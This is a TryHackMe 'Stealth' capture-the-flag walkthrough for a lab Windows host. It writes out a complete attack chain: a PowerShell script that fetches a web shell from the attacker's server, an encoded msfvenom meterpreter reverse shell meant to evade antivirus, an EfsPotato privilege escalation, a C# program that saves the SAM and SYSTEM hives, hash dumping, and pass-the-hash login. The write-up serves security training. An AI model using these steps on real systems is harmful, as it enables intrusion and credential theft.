👀Stealth - TryHackMe Walkthrough / Writeup

Shortest Path to Admin, AV Bypass using msfvenom and meterpreter and more.

TryHackMe | StealthTryHackMe

Room Link

Be like a stealth bomber

Table of Contents

• Recon

• Weaponization

• Delivery

• Exploitation ( Automatic )

  • Theory on why this one worked in the first place

• Exploitation ( Manual Method )

  • Theory on why the manual method works

• Credits to my friends for helping me research on this room

---

Recon

Using nmap scan, for initial recon. I will spare you the delay of looking for open ports :)

nmap -sCV -Pn -p 139,445,3389,5985,8443,8000,8080,47001,49668,49665,49667,49669,49664,49676,49666 -vvv -T4 10.10.255.147

nmap scan output

PORT      STATE SERVICE       REASON  VERSION
139/tcp   open  netbios-ssn   syn-ack Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds? syn-ack
3389/tcp  open  ms-wbt-server syn-ack Microsoft Terminal Services
| ssl-cert: Subject: commonName=HostEvasion
| Issuer: commonName=HostEvasion
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-07-28T19:06:15
| Not valid after:  2024-01-27T19:06:15
| MD5:   110c:1c21:e230:b7c7:41f5:4b6a:bf2b:9e6a
| SHA-1: 34ad:3702:1a0a:2054:88a9:ea0c:820b:da64:b1bd:fb56
| -----BEGIN CERTIFICATE-----
| MIIC2jCCAcKgAwIBAgIQMIOcafxeh79B5cu+rs/taDANBgkqhkiG9w0BAQsFADAW
| MRQwEgYDVQQDEwtIb3N0RXZhc2lvbjAeFw0yMzA3MjgxOTA2MTVaFw0yNDAxMjcx
| OTA2MTVaMBYxFDASBgNVBAMTC0hvc3RFdmFzaW9uMIIBIjANBgkqhkiG9w0BAQEF
| AAOCAQ8AMIIBCgKCAQEA2tUyXSZT7x2YueFMia0tU6xweBIvbwEXw0MBCXtHEf9A
| LqZ6aiwNSsiLeW/kfBsqw6LArZNajuGggR2uj2HLGMn9Yx2RjnMSUaVWlJnB+j7s
| YsgeVOr3Y8rFv0EPD2M6tKEZ7Zh8HoaBifHR3qeNIx+n6YcYmSjb0mUQ5kQso7SS
| L7a9Beya4aynWgHXegaCVP0CcA750BRf1Ax+tjpojoTJOarC0C1QibbDs0s6NbUY
| Z1CakxCRQlENDRau+vqqhRMxlbEfayl1YICTfMe6j3hMnVeYiPjZECt2nSe92i2p
| rnzpdZ4Xbe8tdDzGETQGkBdOCOKPk6/nh80ifpcjBQIDAQABoyQwIjATBgNVHSUE
| DDAKBggrBgEFBQcDATALBgNVHQ8EBAMCBDAwDQYJKoZIhvcNAQELBQADggEBABB4
| HKrRnIrik9ef1F3Ah6r4FsdpCmZ0vXLNixsqm8IY81fNcRTogc/WFytU9gylcxRk
| LhoUqXwtQhKqMFOKcEh3Kq2+VMUvgxTxvDywFS4S02AlhWtafq8NBm5nfxxubuit
| tRO3fvdQ7mKS2hWvapW9+guEt0zJZI3Ai/C4NIq5WpbLEGSJe6DHUwXaPyFiHNYy
| 5j91hKUWbDnIy4TqiIPjhBjYhrTvi46fbGbqMpHelUGABzJ5LFfGjORMOWA1bRPz
| wuaEP62Dimr42pzbLPIgGTmBwpIXlpKdcydbJnVORxY4AfpLV6ypt2EPYS2TpKbz
| 4Fw5A8aWrShuerOI7mc=
|_-----END CERTIFICATE-----
|_ssl-date: 2023-11-29T11:43:47+00:00; 0s from scanner time.
| rdp-ntlm-info: 
|   Target_Name: HOSTEVASION
|   NetBIOS_Domain_Name: HOSTEVASION
|   NetBIOS_Computer_Name: HOSTEVASION
|   DNS_Domain_Name: HostEvasion
|   DNS_Computer_Name: HostEvasion
|   Product_Version: 10.0.17763
|_  System_Time: 2023-11-29T11:43:09+00:00
5985/tcp  open  http          syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
8000/tcp  open  http          syn-ack PHP cli server 5.5 or later
|_http-title: 404 Not Found
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
8080/tcp  open  http          syn-ack Apache httpd 2.4.56 ((Win64) OpenSSL/1.1.1t PHP/8.0.28)
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported:CONNECTION
|_http-server-header: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28
|_http-title: PowerShell Script Analyser
8443/tcp  open  ssl/http      syn-ack Apache httpd 2.4.56 ((Win64) OpenSSL/1.1.1t PHP/8.0.28)
|_ssl-date: TLS randomness does not represent time
|_http-server-header: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28
| ssl-cert: Subject: commonName=localhost
| Issuer: commonName=localhost
| Public Key type: rsa
| Public Key bits: 1024
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2009-11-10T23:48:47
| Not valid after:  2019-11-08T23:48:47
| MD5:   a0a4:4cc9:9e84:b26f:9e63:9f9e:d229:dee0
| SHA-1: b023:8c54:7a90:5bfa:119c:4e8b:acca:eacf:3649:1ff6
| -----BEGIN CERTIFICATE-----
| MIIBnzCCAQgCCQC1x1LJh4G1AzANBgkqhkiG9w0BAQUFADAUMRIwEAYDVQQDEwls
| b2NhbGhvc3QwHhcNMDkxMTEwMjM0ODQ3WhcNMTkxMTA4MjM0ODQ3WjAUMRIwEAYD
| VQQDEwlsb2NhbGhvc3QwgZ8wDQYJKoZIhvcNAQEBBQADgY0AMIGJAoGBAMEl0yfj
| 7K0Ng2pt51+adRAj4pCdoGOVjx1BmljVnGOMW3OGkHnMw9ajibh1vB6UfHxu463o
| J1wLxgxq+Q8y/rPEehAjBCspKNSq+bMvZhD4p8HNYMRrKFfjZzv3ns1IItw46kgT
| gDpAl1cMRzVGPXFimu5TnWMOZ3ooyaQ0/xntAgMBAAEwDQYJKoZIhvcNAQEFBQAD
| gYEAavHzSWz5umhfb/MnBMa5DL2VNzS+9whmmpsDGEG+uR0kM1W2GQIdVHHJTyFd
| aHXzgVJBQcWTwhp84nvHSiQTDBSaT6cQNQpvag/TaED/SEQpm0VqDFwpfFYuufBL
| vVNbLkKxbK2XwUvu0RxoLdBMC/89HqrZ0ppiONuQ+X2MtxE=
|_-----END CERTIFICATE-----
| tls-alpn: 
|_  http/1.1
|_http-title: PowerShell Script Analyser
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
47001/tcp open  http          syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc         syn-ack Microsoft Windows RPC
49665/tcp open  msrpc         syn-ack Microsoft Windows RPC
49666/tcp open  msrpc         syn-ack Microsoft Windows RPC
49667/tcp open  msrpc         syn-ack Microsoft Windows RPC
49668/tcp open  msrpc         syn-ack Microsoft Windows RPC
49669/tcp open  msrpc         syn-ack Microsoft Windows RPC
49676/tcp open  msrpc         syn-ack Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 16378/tcp): CLEAN (Timeout)
|   Check 2 (port 39114/tcp): CLEAN (Timeout)
|   Check 3 (port 33647/udp): CLEAN (Timeout)
|   Check 4 (port 36849/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
|_clock-skew: mean: 0s, deviation: 0s, median: 0s
| smb2-time: 
|   date: 2023-11-29T11:43:13
|_  start_date: N/A

Ok, now as you can see a lot of open ports, but we will only focus on the 8080 port as that is the only way for initial access, unless you found something else.

Visiting the http://target:8080 presents us with the following page.

file upload section

Since this is a windows server, we will upload a powershell file that will execute and download a web shell for us in C:\xampp\htdocs

You may choose any web shell, that you may like, my personal favorite is p0wny Shell.

p0wny-shell/shell.php at master · flozz/p0wny-shellGitHub

download the file in your current directory

Create a powershell script that will download the shell to htdocs directory.

getShell.ps1

# Specify the URL to download the file from
$url = "http://YOUR_IP/shell.php"

# Specify the local path to save the downloaded file
$localPath = "C:\xampp\htdocs\shell.php"

# Download the file and save it locally
Invoke-WebRequest -Uri $url -OutFile $localPath

Before we deliver it, start the server

python -m http.server 80

Now upload our getShell.ps1 file! and wait for it to fetch our shell.php

wait for it to execute

Once done you can check the web shell at http://targetip:8080/shell.php

access the shell

---

Weaponization

As you can see we have a local account access, now we can create a reverse shell payload, an encoded payload to avoid AV detection. But why, we already have a web shell? because....

TRUST ME BRO, TRUST THE PROCESS

Use the following command to generate a msfvenom payload. If you are using your own choice of encoder make sure it is x64.

rev.exe

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=YOUR_IP LPORT=YOUR_PORT -f exe -o rev.exe -e x64/zutto_dekiru

Notice the encoder I am using with -e x64/zutto_dekiru

You may generate the commands from revshells.com, but make sure you are using encoders. This generates a rev.exe file for us. Before we deliver it to target, start the msfconsole listener.

msfconsole

msfconsole -q -x "use multi/handler; set payload windows/x64/meterpreter/reverse_tcp; set lhost YOUR_IP; set lport YOUR_PORT; exploit"

---

Delivery

Once we are all done with the setup, use the web shell to deliver the payload and execute it to get the shell.

execute the shell

And you should receive the connection in no time.

meterpreter session

You may check the uid first, check if its evader or not.

Then check what kind of privileges you have. Execute getprivs

getprivs

Now if you notice carefully, we have a SeImpersonatePrivilege option which is enabled for us.

---

Exploitation ( Automatic )

I will divide the exploitation part, into 2 categories, one is automated with msfconsole and other one is manually exploiting the system.

Let's get started. The first is very simple, just execute : getsystem

And you should have admin access.

Disclaimer : Note that some users have reported, that this might be patched, it may or may not work for you but its worth at-least a try. 👍

getsystem

Theory on why this one worked in the first place

I think since we are using an encoded agent, this avoids detection by AV, the payload might not be touching the disk at all but running in memory, to avoid getting flagged.

Exploitation ( Manual Method )

Once you have a web shell, enumerate the box to check if there is a .NET SDK compiler for us or not.

.NET Compiler

The next prerequisite is to check if you have SeImpersonatePrivilege enabled or not. use the following command.

whoami /priv

SeImpersonatePrivilege

Ok now for the final showdown, we don't need a reverse shell, we will compile an exploit, locally on the system, and also another C sharp file that will execute the registry query to dump SAM/SYSTEM hive.

First lets download the exploit code on our machine.

https://github.com/zcgonvh/EfsPotato/blob/master/EfsPotato.cs

download the exploit code from here

Create another program like backup.cs, use the code below.

backup.cs

using System;
using System.Diagnostics;

class Program
{
    static void Main()
    {
        ExecuteCommand("reg.exe", "save HKLM\\SYSTEM C:\\xampp\\htdocs\\system.bak");
        ExecuteCommand("reg.exe", "save HKLM\\SAM C:\\xampp\\htdocs\\sam.bak");

        Console.WriteLine("Backup completed successfully.");
    }

    static void ExecuteCommand(string command, string arguments)
    {
        Process process = new Process();
        process.StartInfo.FileName = command;
        process.StartInfo.Arguments = arguments;
        process.StartInfo.UseShellExecute = false;
        process.StartInfo.RedirectStandardOutput = true;
        process.StartInfo.CreateNoWindow = true;

        process.Start();

        string output = process.StandardOutput.ReadToEnd();

        process.WaitForExit();

        if (process.ExitCode != 0)
        {
            Console.WriteLine("Error: " + output);
        }
    }
}

Now upload both of the code on our target system using the web shell.

upload the files

Now finally compile them using the following commands.

# For exploit.cs
C:\Windows\Microsoft.Net\Framework\v4.0.30319\csc.exe exploit.cs -nowarn:1691,618
# For backup.cs
C:\Windows\Microsoft.Net\Framework\v4.0.30319\csc.exe backup.cs

Once done, execute them like following.

.\exploit.exe backup.exe

exploit

If you see backup successful, then all is well.

check for the bak files

If you see the bak files being generated, lets get them.

wget http://TARGET_IP:8080/system.bak
wget http://TARGET_IP:8080/sam.bak

Dump the hashes

impacket-secretsdump -sam sam.bak -system system.bak local

Get the hash

Now use Evil-Winrm to access the box as admin, via pass the hash technique

evil-winrm -u Administrator -H ADMIN_HASH -i TARGET_IP

Evil-WinRm

Get User Flag

Get User Flag

The user flag is encoded in base64. Use the following command to decode.

# Download the flag on your own computer and use the following command
cat encodedflag | head -n -1|tail -n +2|base64 -d

it will give you a link to an endpoint which contains a message to get the flag

the message, hints us to remove the log files in uploads directory

Remove the following log file

log file location

And then reload the endpoint again, to get the flag!

User Flag

Get Admin Flag

Get Admin Flag

Theory on why the manual method works

Few years ago, I wrote a simple c program to print hello world, I thought to myself, how can I publish it and share it with others. So I compiled it on my windows machine, and executed it. It worked without any issues. But as soon as I ran it on a different computer or even a VM. Defender/UAC kicked in and flagged it as malicious as it did not have any valid digital certificate. Imagine a simple hello world getting flagged by the AV.

It was not the same with a java program, I wrote a simple hello world, created a jar file, and executed on different machine, it worked without any issues. Since it ran via Java, a trusted binary it did not have any issues.

So in this room, when we are compiling an actual exploit and defender does not find it suspicious, because it thinks the user is not mad to break the system. Same with the backup.cs file as well. But if you compile the program without signing it with a valid digital certificate it might get flagged on a different machine. Even if its running a Windows 10 Home Edition. Now if you think there might be a different reason, please feel free to share with me.

Credits to my friends for helping me research on this room

1st Person

TryHackMe | 0xb0bTryHackMe

For giving me the idea of compiling the exploit

Check out 0xb0b's writeup : https://0xb0b.gitbook.io/writeups/tryhackme/2023/stealth

2nd Person

TryHackMe | gravereaper2038TryHackMe

for giving me the idea of exploitation via metasploit

Thank you for reading my article ❤️ Happy Hunting 😎, feel free to connect with me on Linkedin